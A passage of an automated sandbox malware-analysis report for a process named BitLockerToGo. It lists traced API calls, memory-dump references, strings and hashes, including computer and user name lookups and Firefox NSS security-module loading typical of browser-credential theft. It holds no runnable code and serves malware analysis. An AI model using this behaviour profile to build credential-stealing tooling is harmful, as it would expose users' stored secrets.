                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FolderPathlstrcpy
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1699248803-0
                                                                                                                                                      • Opcode ID: 9e95dfad70f0f2085307d5eaa89947144079090d8800a15aef5a375e65c6f2a5
                                                                                                                                                      • Instruction ID: 4ffcb4c15b35051d73a2b9f91b1896ad4325c798f5b43a7855804b94ed3d88b2
                                                                                                                                                      • Opcode Fuzzy Hash: 9e95dfad70f0f2085307d5eaa89947144079090d8800a15aef5a375e65c6f2a5
                                                                                                                                                      • Instruction Fuzzy Hash: 41E01A31A4034C6BDB91EB94CC9AFAE737DDB44B11F004295BA0C5A1C0DA70AB8A8F91
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 027678E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,02766A2B), ref: 02767910
                                                                                                                                                        • Part of subcall function 027678E0: RtlAllocateHeap.NTDLL(00000000), ref: 02767917
                                                                                                                                                        • Part of subcall function 027678E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0276792F
                                                                                                                                                        • Part of subcall function 02767850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,027511B7), ref: 02767880
                                                                                                                                                        • Part of subcall function 02767850: RtlAllocateHeap.NTDLL(00000000), ref: 02767887
                                                                                                                                                        • Part of subcall function 02767850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0276789F
                                                                                                                                                      • ExitProcess.KERNEL32 ref: 027511C6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Heap$Process$AllocateName$ComputerExitUser
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3550813701-0
                                                                                                                                                      • Opcode ID: b624ba79b7259cd690260561845707ecf8edcb407729a5aea9d79ac1cdae2b7b
                                                                                                                                                      • Instruction ID: f43d3a9c87318e28db9f634959e214e3aa07867616c2c2ec519a55a4c4267ecb
                                                                                                                                                      • Opcode Fuzzy Hash: b624ba79b7259cd690260561845707ecf8edcb407729a5aea9d79ac1cdae2b7b
                                                                                                                                                      • Instruction Fuzzy Hash: F3E012B5D5430253DA0573B4EC0EB3A729DDB0429EF440C24ED09D2201FE66E814C96A
                                                                                                                                                      APIs
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000020,02760759,?,?), ref: 02759888
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??2@
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1033339047-0
                                                                                                                                                      • Opcode ID: 76cd6171d94a53e167778c3c59c728786716fa4696954eb3a36fc164d70256d8
                                                                                                                                                      • Instruction ID: f4b9a8120da9012ab1341e7c2fbc78aceebae089239100bf9a931aac5af7d617
                                                                                                                                                      • Opcode Fuzzy Hash: 76cd6171d94a53e167778c3c59c728786716fa4696954eb3a36fc164d70256d8
                                                                                                                                                      • Instruction Fuzzy Hash: 51F0F4B5D40208FBDB00EFA4D94AB9DB7B8EB04300F148595EE15A7281E675AB14CB91
                                                                                                                                                      APIs
                                                                                                                                                      • PR_CallOnce.NSS3(6CA72120,6C927E60), ref: 6C926EBC
                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C926EDF
                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C926EF3
                                                                                                                                                      • PR_WaitCondVar.NSS3(000000FF), ref: 6C926F25
                                                                                                                                                        • Part of subcall function 6C8FA900: TlsGetValue.KERNEL32(00000000,?,6CA714E4,?,6C894DD9), ref: 6C8FA90F
                                                                                                                                                        • Part of subcall function 6C8FA900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6C8FA94F
                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C926F68
                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(00000008), ref: 6C926FA9
                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C9270B4
                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C9270C8
                                                                                                                                                      • PR_CallOnce.NSS3(6CA724C0,6C967590), ref: 6C927104
                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C927117
                                                                                                                                                      • SECOID_Init.NSS3 ref: 6C927128
                                                                                                                                                      • PORT_Alloc_Util.NSS3(00000057), ref: 6C92714E
                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C92717F
                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C9271A9
                                                                                                                                                      • PR_NotifyAllCondVar.NSS3 ref: 6C9271CF
                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C9271DD
                                                                                                                                                      • free.MOZGLUE(?), ref: 6C9271EE
                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C927208
                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C927221
                                                                                                                                                      • free.MOZGLUE(00000001), ref: 6C927235
                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C92724A
                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C92725E
                                                                                                                                                      • PR_NotifyCondVar.NSS3 ref: 6C927273
                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C927281
                                                                                                                                                      • SECMOD_DestroyModule.NSS3(00000000), ref: 6C927291
                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C9272B1
                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C9272D4
                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C9272E3
                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C927301
                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C927310
                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C927335
                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C927344
                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C927363
                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C927372
                                                                                                                                                      • PR_smprintf.NSS3(name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s",NSS Internal Module,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,6CA60148,,defaultModDB,internalKeySlot), ref: 6C9274CC
                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C927513
                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C92751B
                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C927528
                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C92753C
                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C927550
                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C927561
                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C927572
                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C927583
                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C927594
                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C9275A2
                                                                                                                                                      • SECMOD_LoadModule.NSS3(00000000,00000000,00000001), ref: 6C9275BD
                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C9275C8
                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C9275F1
                                                                                                                                                      • PR_NewLock.NSS3 ref: 6C927636
                                                                                                                                                      • SECMOD_DestroyModule.NSS3(00000000), ref: 6C927686
                                                                                                                                                      • PR_NewLock.NSS3 ref: 6C9276A2
                                                                                                                                                        • Part of subcall function 6C9D98D0: calloc.MOZGLUE(00000001,00000084,6C900936,00000001,?,6C90102C), ref: 6C9D98E5
                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(00000050), ref: 6C9276B6
                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004), ref: 6C927707
                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6C92771C
                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6C927731
                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,rdb:,00000004), ref: 6C92774A
                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?), ref: 6C927770
                                                                                                                                                      • free.MOZGLUE(?), ref: 6C927779
                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C92779A
                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C9277AC
                                                                                                                                                      • PORT_Alloc_Util.NSS3(-0000000D), ref: 6C9277C4
                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C9277DB
                                                                                                                                                      • strrchr.VCRUNTIME140(?,0000002F), ref: 6C927821
                                                                                                                                                      • PORT_Alloc_Util.NSS3(?), ref: 6C927837
                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,00000000,00000000), ref: 6C92785B
                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C92786F
                                                                                                                                                      • SECMOD_AddNewModuleEx.NSS3 ref: 6C9278AC
                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C9278BE
                                                                                                                                                      • SECMOD_AddNewModuleEx.NSS3 ref: 6C9278F3
                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C9278FC
                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C92791C
                                                                                                                                                        • Part of subcall function 6C9007A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C89204A), ref: 6C9007AD
                                                                                                                                                        • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C89204A), ref: 6C9007CD
                                                                                                                                                        • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C89204A), ref: 6C9007D6
                                                                                                                                                        • Part of subcall function 6C9007A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C89204A), ref: 6C9007E4
                                                                                                                                                        • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,6C89204A), ref: 6C900864
                                                                                                                                                        • Part of subcall function 6C9007A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C900880
                                                                                                                                                        • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,?,6C89204A), ref: 6C9008CB
                                                                                                                                                        • Part of subcall function 6C9007A0: TlsGetValue.KERNEL32(?,?,6C89204A), ref: 6C9008D7
                                                                                                                                                        • Part of subcall function 6C9007A0: TlsGetValue.KERNEL32(?,?,6C89204A), ref: 6C9008FB
                                                                                                                                                      Strings
                                                                                                                                                      • kbi., xrefs: 6C927886
                                                                                                                                                      • dll, xrefs: 6C92788E
                                                                                                                                                      • extern:, xrefs: 6C92772B
                                                                                                                                                      • name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s", xrefs: 6C9274C7
                                                                                                                                                      • sql:, xrefs: 6C9276FE
                                                                                                                                                      • NSS Internal Module, xrefs: 6C9274A2, 6C9274C6
                                                                                                                                                      • dbm:, xrefs: 6C927716
                                                                                                                                                      • rdb:, xrefs: 6C927744
                                                                                                                                                      • Spac, xrefs: 6C927389
                                                                                                                                                      • ,defaultModDB,internalKeySlot, xrefs: 6C92748D, 6C9274AA
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: free$strlen$Value$Alloc_ModuleUtil$CriticalSectionstrncmp$CondEnterUnlockcallocmemcpy$CallDestroyErrorLockNotifyOnce$DeleteInitLoadR_smprintfWaitstrrchr
                                                                                                                                                      • String ID: ,defaultModDB,internalKeySlot$NSS Internal Module$Spac$dbm:$dll$extern:$kbi.$name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s"$rdb:$sql:
                                                                                                                                                      • API String ID: 3465160547-3797173233
                                                                                                                                                      • Opcode ID: 9b00e83393084f3ec495b8cb4004dd3dfb03db09ff8f481ff27905ce3c01299f
                                                                                                                                                      • Instruction ID: 012e8283a02018bb80a951f5a5b2d5f96098b9dc51d5168f1a7ce482b99c760e
                                                                                                                                                      • Opcode Fuzzy Hash: 9b00e83393084f3ec495b8cb4004dd3dfb03db09ff8f481ff27905ce3c01299f
                                                                                                                                                      • Instruction Fuzzy Hash: 415237B1E11316DBEF119F64CC05BAA77B8BF15308F148128EC89B2B45E738D954CBA2
                                                                                                                                                      APIs
                                                                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C805492
                                                                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C8054A8
                                                                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C8054BE
                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C8054DB
                                                                                                                                                        • Part of subcall function 6C82AB3F: EnterCriticalSection.KERNEL32(6C87E370,?,?,6C7F3527,6C87F6CC,?,?,?,?,?,?,?,?,6C7F3284), ref: 6C82AB49
                                                                                                                                                        • Part of subcall function 6C82AB3F: LeaveCriticalSection.KERNEL32(6C87E370,?,6C7F3527,6C87F6CC,?,?,?,?,?,?,?,?,6C7F3284,?,?,6C8156F6), ref: 6C82AB7C
                                                                                                                                                        • Part of subcall function 6C82CBE8: GetCurrentProcess.KERNEL32(?,6C7F31A7), ref: 6C82CBF1
                                                                                                                                                        • Part of subcall function 6C82CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C7F31A7), ref: 6C82CBFA
                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8054F9
                                                                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_HELP), ref: 6C805516
                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C80556A
                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C87F4B8), ref: 6C805577
                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000070), ref: 6C805585
                                                                                                                                                      • ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(00000000,00000001), ref: 6C805590
                                                                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP,?,00000001), ref: 6C8055E6
                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C87F4B8), ref: 6C805606
                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C805616
                                                                                                                                                        • Part of subcall function 6C82AB89: EnterCriticalSection.KERNEL32(6C87E370,?,?,?,6C7F34DE,6C87F6CC,?,?,?,?,?,?,?,6C7F3284), ref: 6C82AB94
                                                                                                                                                        • Part of subcall function 6C82AB89: LeaveCriticalSection.KERNEL32(6C87E370,?,6C7F34DE,6C87F6CC,?,?,?,?,?,?,?,6C7F3284,?,?,6C8156F6), ref: 6C82ABD1
                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C80563E
                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C805646
                                                                                                                                                      • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 6C80567C
                                                                                                                                                      • free.MOZGLUE(?), ref: 6C8056AE
                                                                                                                                                        • Part of subcall function 6C815E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C815EDB
                                                                                                                                                        • Part of subcall function 6C815E90: memset.VCRUNTIME140(6C857765,000000E5,55CCCCCC), ref: 6C815F27
                                                                                                                                                        • Part of subcall function 6C815E90: LeaveCriticalSection.KERNEL32(?), ref: 6C815FB2
                                                                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_NO_BASE), ref: 6C8056E8
                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C805707
                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001), ref: 6C80570F
                                                                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_ENTRIES), ref: 6C805729
                                                                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_DURATION), ref: 6C80574E
                                                                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_INTERVAL), ref: 6C80576B
                                                                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES_BITFIELD), ref: 6C805796
                                                                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES), ref: 6C8057B3
                                                                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FILTERS), ref: 6C8057CA
                                                                                                                                                      Strings
                                                                                                                                                      • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C80548D
                                                                                                                                                      • - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s, xrefs: 6C805CF9
                                                                                                                                                      • [I %d/%d] -> This process is excluded and won't be profiled, xrefs: 6C805BBE
                                                                                                                                                      • MOZ_PROFILER_STARTUP_FEATURES, xrefs: 6C8057AE
                                                                                                                                                      • MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C805766
                                                                                                                                                      • [I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d, xrefs: 6C80584E
                                                                                                                                                      • MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C805724
                                                                                                                                                      • [I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u, xrefs: 6C805C56
                                                                                                                                                      • GeckoMain, xrefs: 6C805554, 6C8055D5
                                                                                                                                                      • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C8054A3
                                                                                                                                                      • MOZ_PROFILER_STARTUP, xrefs: 6C8055E1
                                                                                                                                                      • [I %d/%d] profiler_init, xrefs: 6C80564E
                                                                                                                                                      • MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C805791
                                                                                                                                                      • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C8054B9
                                                                                                                                                      • [I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d, xrefs: 6C805AC9
                                                                                                                                                      • MOZ_PROFILER_STARTUP_NO_BASE, xrefs: 6C8056E3
                                                                                                                                                      • - MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s, xrefs: 6C805D01
                                                                                                                                                      • MOZ_BASE_PROFILER_HELP, xrefs: 6C805511
                                                                                                                                                      • MOZ_PROFILER_STARTUP_DURATION, xrefs: 6C805749
                                                                                                                                                      • - MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB, xrefs: 6C805D2B
                                                                                                                                                      • - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s, xrefs: 6C805D1C
                                                                                                                                                      • MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C8057C5
                                                                                                                                                      • [I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s, xrefs: 6C805B38
                                                                                                                                                      • - MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s, xrefs: 6C805D24
                                                                                                                                                      • [I %d/%d] - MOZ_PROFILER_STARTUP is set, xrefs: 6C805717
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: getenv$CriticalSection$Current$Thread$EnterLeaveProcess$ExclusiveLock_getpidfree$AcquireCreation@Init_thread_footerReleaseStamp@mozilla@@TerminateTimeV12@exitmemsetmoz_xmalloc
